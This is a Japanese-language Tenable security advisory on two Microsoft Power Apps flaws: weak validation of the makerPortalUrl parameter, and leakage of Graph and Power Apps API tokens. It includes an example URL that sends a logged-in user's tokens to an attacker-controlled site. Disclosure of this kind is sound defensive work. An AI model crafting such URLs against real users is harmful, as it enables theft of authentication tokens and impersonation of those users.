Microsoft Power Apps (apps.powerapps.com、make.powerapps.com) に発見された複数の脆弱性
中概要
apps.powerapps.com/teams/makerportal makerportalUrl パラメーターにおける不十分な入力検証
apps.powerapps.com/teams/makerportal にある makerPortalUrl パラメーターが供給された URL を十分に検証しない
悪意のある攻撃者がこの欠陥を利用して Microsoft Teams のタブに偽のコンテンツを掲載してユーザーの認証トークンを盗むことができる。
tokens for graph.make.powerapps.com と api.powerapps.com が使うユーザー認証トークンの盗取
make.powerapps.com にログオンしているユーザーが、次のような形式のページにアクセスすると、
https://make.powerapps.com/teams/powerapps/acquire/mscrm.test/status/https%3a%2f%2f<attacker-controlled-site>
そのユーザーの graph.make.powerapps.com と api.powerapps.com のための認証用トークンが攻撃者がコントロールするサイトに漏洩される。
悪意のある攻撃者はこの欠陥を利用して、他の複数の認証用トークンを盗み、ユーザーになりすまして複数の Microsoft サービスにリクエストを送信することができる。
TRA アドバイザリで報告する情報は、すべて「生」で提供され、商品としてまたは特定の目的に適していることを暗示する保証や、完成度、精度、適時性の保証などを含むいかなる保証もありません。実際のまたは潜在的なセキュリティ上のいかなる脆弱性も、その影響の評価責任は個人と組織にあります。
Tenable は製品のセキュリティと真剣に取り組んでいます。当社の製品に脆弱性を発見されたと思われる場合には、お客様を保護するために、共同で素早く解決するようご協力をお願いいたします。 Tenable はそのような報告には迅速に対応し、リサーチャーと連携して短期間でソリューションを提供することを方針としています。
脆弱性情報の報告の方法について詳しくは、本ウェブサイトの Vulnerability Reporting Guidelines のページをご覧ください。
本アドバイザリに関するご質問、修正点などは、次のアドレスまで E メールでご連絡いただけるようお願いいたします。 [email protected]
リスク情報 :
Evan Grant
Microsoft Power Apps
Microsoft Teams
中